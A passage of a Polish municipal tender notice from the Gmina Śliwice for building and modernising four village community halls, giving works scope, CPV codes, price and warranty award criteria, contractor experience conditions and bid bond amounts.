elementy malej architektury: fontanna i urządzenia zabawowe (budynek gospodarczy, 3 wiaty, fontanna i<br/>utwardzenie powierzchni gruntu przeznaczone do rozbiórki).<br/>Na działce występuje infrastruktura podziemna w postaci przyłącza wodociągowego wraz ze studnią wodomierzową oraz infrastruktura nadziemna – napowietrzne przyłącze elektroenergetyczne. Ukształtowanie działki stosunkowo płaskie z lekkim skłonem w kierunku południowym. Część powierzchni działki utwardzona jest kostką betonową, pozostały obszar porośnięty trawą. Działka jest częściowo ogrodzona od strony północnej.<br/>Budynek gospodarczy, 3 wiaty, fontanna i utwardzenie powierzchni gruntu przeznaczone do rozbiórki.<br/>5.2.3 Projektowane zagospodarowanie działki, w tym:<br/>1. urządzenia budowlane związane z obiektami budowalnymi:<br/>-	zewnętrzna instalacja wodociągowa PE Ø 32;<br/>-	zewnętrzna instalacja kanalizacji sanitarnej PCV Ø 160 wraz ze studnią rewizyjną Ø 600 mm;<br/>-	bezodpływowy zbiornik na nieczystości ciekłe o poj. 9,8 m3;<br/>-	miejsce gromadzenia odpadów stałych;<br/>-	utwardzenie powierzchni gruntu z kostki betonowej.<br/>-	napowietrzne przyłącze energetyczne (istniejące)<br/>2. sposób odprowadzania lub oczyszczania ścieków<br/>Ścieki odprowadzane będą do szczelnego, wybieralnego, bezodpływowego zbiornika na nieczystości ciekłe o pojemności 9,8 m3 (czynnej 9,0 m3) poprzez projektowaną zewnętrzną instalację kanalizacji sanitarnej.<br/>3. układ komunikacyjny<br/>Układ komunikacyjny na działce nr 243 stanowić będą projektowane utwardzenia powierzchni gruntu o nawierzchni z kostki betonowej grubości 8 cm.<br/>4.	sposób dostępu do drogi publicznej<br/>Dostęp na działkę nr 243 poprzez zjazd publiczny (wg odrębnego opracowania) z działki 211 stanowiącej drogę gminną o nawierzchni gruntowej.<br/>5. parametry techniczne sieci i urządzeń uzbrojenia terenu<br/>-	instalacja wodociągowa PE Ø 32 L=7,80 m;<br/>-	zewnętrzna instalacja kanalizacji sanitarnej PCV Ø160 L= 26,90 m;<br/>-	zbiornik bezodpływowy żelbetowy 2,4 x 3,0 x 1,85 m;<br/>-	studnia rewizyjna tworzywowa Ø 600 mm;<br/>-	istniejące elektroenergetyczne przyłącze napowietrzne (przed rozpoczęciem robót<br/>-	rozbiórkowych budynku gospodarczego należy zgłosić odłączenie przyłącza napowietrznego energetycznego w Rejonie Energetycznym Chojnice).<br/>6.	uksztaltowanie terenu i układ zieleni<br/>Ukształtowanie terenu nie ulegnie zmianie, inwestycja dostosowana do istniejących rzędnych terenu. Układ zieleni stanowić będą istniejące trawniki.<br/>5.2.4 Zestawienie powierzchni:<br/>1.	powierzchnia zabudowy projektowanych i istniejących obiektów budowlanych<br/>-	Powierzchnia zabudowy istniejącego budynku gospodarczego - 19,93 m2<br/>-	Powierzchnia zabudowy istniejących drewnianych wiat - 124,70 m2<br/>-	(w tym 3 wiaty przeznaczone do rozbiórki o łącznej powierzchni 61,05 m2)<br/>-	Powierzchnia zabudowy projektowanego budynku kulturalno - oświatowego - 122,94 m2<br/>-	Powierzchnia zabudowy zadaszonego tarasu - 32,64 m2<br/>2.	powierzchnia dróg, parkingów, placów i chodników<br/>Powierzchnia proj. utwardzeń o nawierzchni z kostki betonowej gr. 8 cm - 210,00 m2<br/>3.	powierzchnia biologicznie czynna<br/>Powierzchnia biologicznie czynna (trawniki) - 2 282,77 m2<br/>4.	powierzchnia innych części działki<br/>Elementy przewidziane do rozbiórki nie wliczone w zestawienie powierzchni:<br/>- budynek gospodarczy o powierzchni 19,93 m2<br/>- wiaty - 3 sztuki o łącznej powierzchni 61,05 m2<br/>- utwardzenie powierzchni gruntu o powierzchni 99,50 m2. <br/>5.2.5 Szczegółowy opis przedmiotu zamówienia zawarty jest w dokumentacji projektowej zatwierdzonej decyzją pozwolenia na budowę nr BD.6740.ŚL.15.2022 z dnia 11 kwietnia 2022 r. oraz w dokumentacji projektowej stanowiącej Załącznik Nr 7.2 do SWZ, w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych stanowiącej Załącznik Nr 9.2 do SWZ i przedmiarze robót stanowiącym Załączniki nr 8.8 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45422000-1 - Roboty ciesielskie</p> <p class="mb-0">45261210-9 - Wykonywanie pokryć dachowych</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45421146-9 - Instalowanie sufitów podwieszanych</p> <p class="mb-0">45431000-7 - Kładzenie płytek</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybierze ofertę najkorzystniejszą spośród ofert nie<br/>odrzuconych na podstawie kryteriów oceny ofert określonych w SWZ. 2. Przy wyborze ofert<br/>Zamawiający kierować się będzie następującym kryterium: A - Cena (waga 60%), B - Okres gwarancji<br/>jakości (waga 40%). 3. W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane<br/>są punkty za powyższe kryteria. Zastosowanie będzie miał następujący wzór: P<br/>(punkty) = A+B 4. Za ofertę najkorzystniejszą zostanie uznana ta, która uzyskała największą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest „Rozwój infrastruktury kulturalnej na terenie Gminy Śliwice”. <br/>2.	Zakres zamówienia został podzielony na części:<br/>1)	Część I - budowę świetlicy w m. Główka wraz z zagospodarowaniem terenu, <br/>2)	Część II - budowę świetlicy w m. Laski wraz z zagospodarowaniem terenu, <br/>3)	Część III - modernizację świetlicy w Brzeźnie,<br/>4)	Część IV - modernizację świetlicy w Byłyczku. <br/>3.	Zamówienie jest dofinansowane ze środków pochodzących z Programu Rządowego Fundusz Polski Ład: Program Inwestycji Strategicznych<br/>4.	Zamawiający może unieważnić niniejsze postępowanie o udzielenie zamówienia, jeżeli środki publiczne, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane. <br/>5.	Opis części przedmiotu zamówienia: <br/>5.3	Część III modernizacja świetlicy w Brzeźnie<br/>5.3.1 Modernizacja świetlicy w Brzeźnie obejmuje następujący zakres robót:<br/>1.	Wymiana zewnętrznej stolarki drzwiowej i okiennej z PCV;<br/>2.	Demontaż kart okiennych i daszku wejściowego;<br/>3.	Naprawa popękanych murów zewnętrznych budynku;<br/>4.	Wykonanie termomodernizacji ścian zewnętrznych styropiany gr. 18 cm oraz ścian fundamentowych typu Styrodur XPS 100 gr 12 cm;<br/>5.	Wykonanie izolacji przeciwwilgociowych ścian fundamentowych budynku;<br/>6.	Zagospodarowanie wokół budynku (wykonanie utwardzonych dość i wjazdów oraz opaski wokół budynku z kostki betonowej);<br/>7.	Wykonanie nowych schodów betonowych z okładziną z płyt granitowych gr. 5cm<br/>8.	Naprawa więźby dachowej, wymiana uszkodzonych krokwi, prostowanie więźby, wymiana ołacenia dachu;<br/>9.	Wykonanie pokrycia dachu z blachy powlekanej modułowej koloru ceglastego wraz z obróbkami i orynnowaniem;<br/>10.	Demontaż i utylizacja płyt azbestowo - cementowych z dachu budynku;<br/>11.	Rozbiórka kominów do stropu i wykonanie nowych kominów z cegły klinkierowej pełnej.<br/>12.	Tablica informacyjna (Gablota wolnostojąca z ozdobna koroną z napisem &#34;SOŁECTWO BRZEŹNO”);<br/>13.	Wykonanie termomodernizacji poddasza – ocieplenie poddasza wełną mineralną gr 25 cm z przykryciem przeciw wilgociowym z foli PE – bez pokrycia z płyt GK.<br/>5.3.2 Szczegółowy opis przedmiotu zamówienia zawarty jest w dokumentacji projektowej składającej się ze Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych stanowiącej Załącznik Nr 9.3 do SWZ i przedmiarze robót stanowiącym Załączniki nr 8.3 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45100000-8 - Przygotowanie terenu pod budowę</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybierze ofertę najkorzystniejszą spośród ofert nie<br/>odrzuconych na podstawie kryteriów oceny ofert określonych w SWZ. 2. Przy wyborze ofert<br/>Zamawiający kierować się będzie następującym kryterium: A - Cena (waga 60%), B - Okres gwarancji<br/>jakości (waga 40%). 3. W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane<br/>są punkty za powyższe kryteria. Zastosowanie będzie miał następujący wzór: P<br/>(punkty) = A+B 4. Za ofertę najkorzystniejszą zostanie uznana ta, która uzyskała największą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest „Rozwój infrastruktury kulturalnej na terenie Gminy Śliwice”. <br/>2.	Zakres zamówienia został podzielony na części:<br/>1)	Część I - budowę świetlicy w m. Główka wraz z zagospodarowaniem terenu, <br/>2)	Część II - budowę świetlicy w m. Laski wraz z zagospodarowaniem terenu, <br/>3)	Część III - modernizację świetlicy w Brzeźnie,<br/>4)	Część IV - modernizację świetlicy w Byłyczku. <br/>3.	Zamówienie jest dofinansowane ze środków pochodzących z Programu Rządowego Fundusz Polski Ład: Program Inwestycji Strategicznych<br/>4.	Zamawiający może unieważnić niniejsze postępowanie o udzielenie zamówienia, jeżeli środki publiczne, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane. <br/>5.	Opis części przedmiotu zamówienia: <br/>5.4	Części IV modernizacja świetlicy w Byłyczku <br/>5.4.1 Modernizacja świetlicy w Byłyczku obejmuje następujący zakres robót:<br/>1.	Wymiana zewnętrznej stolarki drzwiowej i okiennej;<br/>2.	Naprawa popękanych murów zewnętrznych budynku<br/>3.	Wykonanie termomodernizacji ścian zewnętrznych z płyt styropianowych gr. 12 cm oraz ścian fundamentowych typu Styrodur XPS 100 gr 10 cm;<br/>4.	Wykonanie izolacji przeciwwilgociowych ścian fundamentowych budynku;<br/>5.	Zagospodarowanie wokół budynku (wykonanie utwardzonych dość i wjazdów, stanowisk postojowych, opaski wokół budynku z kostki betonowej);<br/>6.	Tablica informacyjna (Gablota wolnostojąca z ozdobna koroną z napisem &#34;SOŁECTWO BYŁYCZEK”);<br/>7.	Wykonanie nowych schodów betonowych z okładziną z płyt granitowych gr. 5cm<br/>8.	Wykonanie daszku nad wejściem<br/>9.	Wykonanie remontu wewnętrznych pomieszczeń:<br/>-	demontaż podłóg drewnianych na piętrze i wykonanie nowych;<br/>-	demontaż okładzin sufitów i wykonanie nowych podwieszanych z płytGK;<br/>-	wykonanie gładzi ścian i sufitów;<br/>-	malowanie ścian i sufitów,<br/>-	wykonanie lamperii ścian ,<br/>-	termomodernizacja podłogi na gruncie,<br/>-	demontaż i montaż nowej instalacji elektrycznej ,<br/>-	montaż komina narożnego,<br/>-	demontaż i montaż nowej instalacji kanalizacyjnej wraz z montażem zbiornika na ścieki, <br/>-	dostawa i montaż wyposażenia kuchni,<br/>5.4.2 Szczegółowy opis przedmiotu zamówienia zawarty jest w dokumentacji projektowej stanowiącej Załącznik Nr 7.4 do SWZ, w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych stanowiącej Załącznik Nr 9.4 do SWZ i przedmiarze robót stanowiącym Załączniki nr 8.4 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45100000-8 - Przygotowanie terenu pod budowę</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybierze ofertę najkorzystniejszą spośród ofert nie<br/>odrzuconych na podstawie kryteriów oceny ofert określonych w SWZ. 2. Przy wyborze ofert<br/>Zamawiający kierować się będzie następującym kryterium: A - Cena (waga 60%), B - Okres gwarancji<br/>jakości (waga 40%). 3. W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane<br/>są punkty za powyższe kryteria. Zastosowanie będzie miał następujący wzór: P<br/>(punkty) = A+B 4. Za ofertę najkorzystniejszą zostanie uznana ta, która uzyskała największą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej.<br/>2.	Dla uznania, że Wykonawca spełnia warunek, o którym mowa w pkt. 1, Zamawiający wymaga, aby Wykonawca wykazał, że:<br/><br/>Część I - budowa świetlicy w m. Główka wraz z zagospodarowaniem terenu,<br/><br/>1)	posiada wiedzę i doświadczenie polegające na wykonaniu robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Zamawiający uzna, że warunek wiedzy i doświadczenia zostanie spełniony, jeśli Wykonawca wykaże, że wykonał co najmniej 2 (dwie) roboty budowlane polegające na budowie, przebudowie, rozbudowie lub remoncie budynku o wartości nie mniejszej niż 400 000,00 zł każda.<br/><br/>Część II - budowa świetlicy w m. Laski wraz z zagospodarowaniem terenu,<br/>1)	posiada wiedzę i doświadczenie polegające na wykonaniu robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Zamawiający uzna, że warunek wiedzy i doświadczenia zostanie spełniony, jeśli Wykonawca wykaże, że wykonał co najmniej 2 (dwie) roboty budowlane polegające na budowie, przebudowie, rozbudowie lub remoncie budynku o wartości nie mniejszej niż 400 000,00 zł każda.<br/><br/>Część III - modernizacja świetlicy w Brzeźnie,<br/>1)	posiada wiedzę i doświadczenie polegające na wykonaniu robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Zamawiający uzna, że warunek wiedzy i doświadczenia zostanie spełniony, jeśli Wykonawca wykaże, że wykonał co najmniej 2 (dwie) roboty budowlane polegające na budowie, przebudowie, rozbudowie lub remoncie budynku o wartości nie mniejszej niż 200 000,00 zł każda.<br/><br/>Część IV - modernizacja świetlicy w Byłyczku.<br/>1)	posiada wiedzę i doświadczenie polegające na wykonaniu robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Zamawiający uzna, że warunek wiedzy i doświadczenia zostanie spełniony, jeśli Wykonawca wykaże, że wykonał co najmniej 2 (dwie) roboty budowlane polegające na budowie, przebudowie, rozbudowie lub remoncie budynku o wartości nie mniejszej niż 300 000,00 zł każda. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu, wykonawca złoży zamiast podmiotowych środków dowodowych, oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego.<br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia także<br/>oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP, w zakresie podstaw<br/>wykluczenia z postępowania wskazanych przez zamawiającego - podmiotu udostępniającego zasoby.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu<br/>potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu na wezwanie Zamawiającego Wykonawca<br/>zobowiązany będzie do złożenia następujących dokumentów:<br/>1) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie zgodnie z<br/>Załącznikiem nr 5 do SWZ, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot,<br/>na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów - inne odpowiednie dokumenty.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.Zamawiający przewiduje składanie przedmiotowych środków dowodowych.<br/>2. Przedmiotowe środki dowodowe sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach<br/>wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących<br/>zadania publiczne (Dz. U. z 2021 r. poz. 670).<br/>3.Przedmiotowymi środkami dowodowymi w niniejszym postępowaniu są dokumenty składane wraz z ofertą potwierdzające<br/>spełnienie wymagań równoważności, w szczególności: specyfikacja techniczna, katalog produktu, zaświadczenie, certyfikat<br/>itp.<br/>4. Jeżeli wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą<br/>niekompletne, zamawiający przewiduje możliwość wezwania wykonawcy do ich złożenia lub uzupełnienia w wyznaczonym<br/>przez zamawiającego terminie (art. 107 ust. 2 PZP). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1. Przedmiotowymi środkami dowodowymi w niniejszym postępowaniu są dokumenty składane wraz z ofertą potwierdzające<br/>spełnienie wymagań równoważności, w szczególności: specyfikacja techniczna, katalog produktu, zaświadczenie, certyfikat<br/>itp.<br/>2 Jeżeli wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą<br/>niekompletne, zamawiający przewiduje możliwość wezwania wykonawcy do ich złożenia lub uzupełnienia w wyznaczonym<br/>przez zamawiającego terminie (art. 107 ust 2 Pzp). <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą Wykonawca zobowiązany jest złożyć:<br/>1. oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp o niepodleganiu wykluczeniu z postępowania oraz spełnianiu<br/>warunków udziału w postępowaniu w zakresie wskazanym przez<br/>Zamawiającego – zgodnie z Załącznikiem Nr 2A do SWZ;<br/>− w przypadku wspólnego ubiegania się o zamówienie przez wielu wykonawców, oświadczenie składa każdy z<br/>wykonawców, oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu;<br/>− w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby Wykonawca przedstawia także oświadczenie podmiotu udostępniającego zasoby potwierdzającego brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału w zakresie, w jakim wykonawca powołuje się na jego zasoby – zgodnie z Załącznikiem Nr 2B do SWZ;<br/>2) dokument potwierdzający umocowanie do reprezentowania Wykonawcy, jeżeli w imieniu Wykonawcy działa osoba, której<br/>umocowanie do jego reprezentowania nie wynika z odpisu lub<br/>informacji Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego<br/>właściwego rejestru,<br/>3) pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu<br/>albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy);<br/>4) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, składane na podstawie art. 117 ust. 4<br/>ustawy, z którego wynika, które roboty budowlane wykonają<br/>poszczególni wykonawcy - zgodnie z Załącznikiem Nr 3 do SWZ (jeżeli dotyczy),<br/>5) zobowiązanie podmiotu udostępniającego zasoby do oddania wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji danego zamówienia (zgodnie z Załącznikiem Nr 4<br/>do SWZ) lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów w przypadku polegania<br/>na zdolnościach innych podmiotów (jeżeli dotyczy),<br/>6) dokument potwierdzający wpłacenie lub wniesienie wadium,<br/>7) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub<br/>innego właściwego rejestru w celu potwierdzenia, że osoba<br/>działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania. Wykonawca nie jest zobowiązany do złożenia<br/>ww. dokumentu, jeżeli zamawiający może go uzyskać za pomocą<br/>bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tego dokumentu;<br/>8) przedmiotowe środki dowodowe. Przedmiotowymi środkami dowodowymi w niniejszym postępowaniu są dokumenty<br/>składane wraz z ofertą potwierdzające spełnienie wymagań równoważności, w szczególności: specyfikacja techniczna,<br/>katalog produktu, zaświadczenie, certyfikat itp. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Oferta musi być zabezpieczona wadium w wysokości odpowiednio dla:<br/>1)	Części I - 6 000,00 zł (słownie: sześć tysięcy złotych 00/100).<br/>2)	Części II - 6 000,00 zł (słownie: sześć tysięcy złotych 00/100).<br/>3)	Części III - 3 000,00 zł (słownie: trzy tysiące złotych 00/100).<br/>4)	Części IV - 3 000,00 zł (słownie: trzy tysiące złotych 00/100).<br/>Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy.<br/>3.	Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu<br/>2)	gwarancjach bankowych<br/>3)	